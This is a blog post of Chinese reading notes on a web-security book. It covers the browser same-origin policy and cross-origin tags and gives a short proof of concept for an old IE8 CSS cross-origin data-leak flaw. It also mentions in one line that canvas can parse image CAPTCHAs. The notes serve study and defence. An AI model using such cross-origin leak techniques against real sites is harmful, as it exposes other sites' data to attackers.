读书笔记----白帽子讲web安全--2015-11-27

最新推荐文章于 2023-06-21 18:51:20 发布
最新推荐文章于 2023-06-21 18:51:20 发布
阅读量1.2k 收藏
点赞数
分类专栏: 读书笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010459047/article/details/50066917
版权

一,浏览器的同源策略

      1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性

     2. 但是在浏览器中,某些标签是可以跨域加载资源:<script>.,<img><iframe><link>,利用这些标签加载其他未知文件会导致网站陷入不安全中

     3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。

    4. ie8 css的跨域漏洞:http://www.2cto.com/Article/201009/73046.html

    example:

    POC:
    www.a.com/test.html:
   <body>
   {}body{fontFamily:

  aaaaaaaaaaaaaa

  bbbbbbbbbbbbbbbb

  </body>


  www.b.com/test2.html:
  <style>
  @import url("http://www.a.com/test.html");
  </style>
 
  <script>

 setTimeout(function(){
 var t = document.body.currentStyle.fontFamily;
 alert(t);
 },2000);

 </script>

  5.防护措施:浏览器的沙箱模式;恶意网址拦截;EV证书






二:html5的canvas标签可以解析图片验证码













Yolanda--Lau
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《技术人的管理之路》读书笔记 -思维导图
04-19
《技术人的管理之路》读书笔记 --思维导图 《技术人的管理之路》读书笔记 --思维导图 《技术人的管理之路》读书笔记 --思维导图 《技术人的管理之路》读书笔记 --思维导图 《技术人的管理之路》读书笔记 --思维导图 ...
白帽子Web安全——世界观安全
独活
11-14 5997
一、web安全简史 1、不想拿“root”的黑客不是好黑客 2、在黑客的世界里,有的黑客,精通计算机技术,能自己挖掘漏洞,并编写exp;而有的黑客只懂得编译别人的代码,自己没有动手能力,这种黑客被称为脚本小子。在现实世界里,真正造成破坏的往往是脚本小子。 3、中国黑客的发展分为三个阶段:启蒙阶段、黄金阶段、黑暗阶段。黑暗阶段从几年前开始一直延续到今天,也许还将继续下去。 4、黑客技术:早期以系统软件居多,攻击系统软件往往能直接获取root权限;web1.0时代:服务器端端脚本安全问题;we...
白帽子Web安全》世界观安全
FangWenJing150的博客
03-25 1507
1.回顾了安全的历史。 2.阐述了安全的看法与态度。 3.提出了一些思考问题的方式以及做事的方法。
白帽子Web安全】第一章 我的安全世界观
xtcc的博客
07-18 2178
web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。实际上,缓冲区溢出,也可以认为是程序违背了这一原则的后果——程序在栈或者堆中,将用户数据当做代码执行,混淆了代码与数据的边界,从而导致安全问题的发生。要求系统只授予主体必要的权限,而不要过度授权,这样能有效地减少系统,网络,应用,数据库出错的机会。...
学习web安全,强烈推荐这本《白帽子web安全》!
热门推荐
codedz的博客
05-29 2万+
Web是互联网的核心,是未来云计算和移动互联网的最佳载体,因此Web安全也是互联网公司安全业务中最重要的组成部分。 下面来看看几种常见的web漏洞: 1.XSS跨站脚本攻击 XSS跨站脚本攻击,通常指黑客通过”HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS根据效果的不同还分为:反射型XSS、存储型XSS、DOM Based XSS   ...
白帽子Web安全
11-16 1万+
第一篇:世界观安全第一章:我的安全世界观一个网站的数据库,在没有任何保护的情况下,数据库服务端口是允许任何人随意连接的;在有了防火墙的保护后,通过ACL可以控制只允许信任来源的访问。这些措施在很大程度上保证了系统软件处于信任边界之内,从而杜绝了绝大部分的攻击来源。1.1.3Web安全的兴起常见攻击:SQL注入,XSS(跨站脚本攻击)“破坏往往比建设容易”,但凡事都不是绝对的。一般来说,白帽子选择的方
storm读书笔记---storm运行流程
01-27
本文来自于csdn,本文简要通过storm和Hadoop各角色对比,介绍了storm的运行流程,希望对您的学习有帮助。一、storm是一个用于实时流式计算的分布式计算引擎,弥补了Hadoop在实时计算方面的不足(Hadoop在本质上是一...
CAD实训读书笔记-应用文.pdf
11-15
CAD实训读书笔记-应用文.pdf
教师暑假读书笔记-读《大数据》随感.doc
12-21
教师暑假读书笔记-读《大数据》随感.doc
java笔记 Java-Web笔记 J2EE三大框架笔记
10-19
java笔记 Java-Web笔记 J2EE三大框架笔记
白帽子Web安全》学习笔记
qq_53058639的博客
03-18 268
最近加入新公司后,公司的官网突然被Google标记为了不安全的诈骗网站,一时间我们信息技术部门成为了众矢之的,虽然老官网并不是我们开发的(因为开发老官网的前辈们全都跑路了)。我们花了很多时间做Web安全扫描以及修复,在检查和修复过程中,发现老系统的代码的不可维护性(再次说明整洁代码之道Clean Code的重要性)及安全性(同时也说明了Web安全的重要性)。修复之后,向Google提出了申诉,漫长的等待(1~2天对于公司的官网来说就是Money啊!)后Google放开了。
白帽子web安全 笔记(一)
qq_53137566的博客
06-21 315
第一章结束!
读《白帽子Web安全》有感
分享与记录
01-20 1624
该博客转自hangshao.tech,之前忘记在CSDN发布了。 今天是2020.11.19,我开始了第二次拜读《白帽子Web安全》。 记得大一的时候就买过这本书,不过奈何当时水平有限,实在是难以阅读下去,于是放弃。我想,在大三的时候再来重拾这本书,应该会有所收获,如果还能作一个总结,那便更好,所以现在陆陆续续地写一些吧,写一点发一点,或许全部写完的时候,已经是2021年了。(在写了在写了…) 第一章是巨佬吴翰清述他的安全世界观。这一章了中国黑客史,介绍了白帽子和黑帽子,揭示了他认为的安全问题的本质
白帽子web安全》学习笔记——web安全概述
a2562614613的博客
08-28 738
一、安全的三要素 1、机密性 机密性要求保护数据内容不被泄露,加密是实现机密性要求的常见方法,比如常见的对称加密算法和非堆成加密算法。 2、完整性 完整性要求保护数据内容是完整的,没有被篡改,常见的保证一致性的技术手段是数据签名。 3、可用性 可用性要求保护资源是“随需而得”。安全领域中,拒绝服务攻击破坏得就职安全的可用应。 安全领域中,除以上要素外,仍然存在一些其他要素,比如不可抵赖性、可审计性,但最重要的要素便是以上三个。在...
白帽子web安全(精写含思维导图)
加油~
06-06 5456
安全从业必读
白帽子web安全读后感
wswr的博客
03-11 962
第一章 我的安全世界观 安全问题本质就是信任问题【你总要制定一个基准以此判断是否安全,这个基准怎么理解呢,比方上传文件,做的限制和过滤就是一个基准,通过这个基准你去信任自己是否是安全的】 安全是一个持续的过程【攻防都在进步,道高一尺魔高一丈,不断出现的漏洞和对应补丁就是很好的例子去理解为什么持续的安全白帽子兵法: Secure by Default(默认的安全)一方面是白名单思想【黑名单存在被各种可能的绕过】,一方面是最小权限原则(最差的情况即使被攻克了,拿到的权限也不高) 纵深防御原则:一方
白帽子web安全读书笔记以及读后感
Alexz__的博客
06-15 1733
因为本书作于2010年前,书中所使用的部分技术版本已经过于老旧,很多书中提到的攻击方法和绕过思路都已经严重落后,但之所以本书会成为安全界的经典必读书目,就是因为本书所讨论的安全思想尤为精华,对于企业来说的安全建设十分有用,所以我打算读这本书的过程中主要记录下来一些重要的安全思路,绕过思想,重要的烧过姿势,不回去特意记录他所有的精工代码等等 对于IT这个领域来说10年的时间足矣改变整个行业的组织架构,走了很多,也来了很多 第一章 我的安全世界观 1.4 安全是一个持续的过程;破...
白帽子Web安全——客户端安全
u011423880的博客
07-27 608
一.跨站脚本攻击(XSS) 1.简介 XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 2.类型 XSS根据效果的不同可以分成如下几类。 (1) 反射型XSS 反射型XSS只是简单地把用户输入的数据“反射”给浏览器。也就是说,黑客往往需要诱使用户“点击”一个恶意链接,才能攻击成功。反射型XSS也叫做“非持久型XSS”(Non-persistent XSS)。 (2) 存储型XSS 存储型XSS会把用户输入的数据“存储”在服务器端。这种X
在学习web安全的小白看过来,这本《白帽子web安全》强烈推荐,必读!(附PDF)
m0_74914256的博客
05-23 2119
Web是互联网的核心,是未来云计算和移动互联网的最佳载体,因此Web安全也是互联网公司安全业务中最重要的组成部分。
ARM笔记-----输出比较
最新发布
03-31
ARM笔记是一种基于ARM架构的便携式电子设备,主要用于记录和存储文字、图像、音频等信息。它具有以下特点: 1. 轻便便携:ARM笔记通常采用轻薄的设计,重量较轻,易于携带。用户可以随时随地使用它进行记录和查阅。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值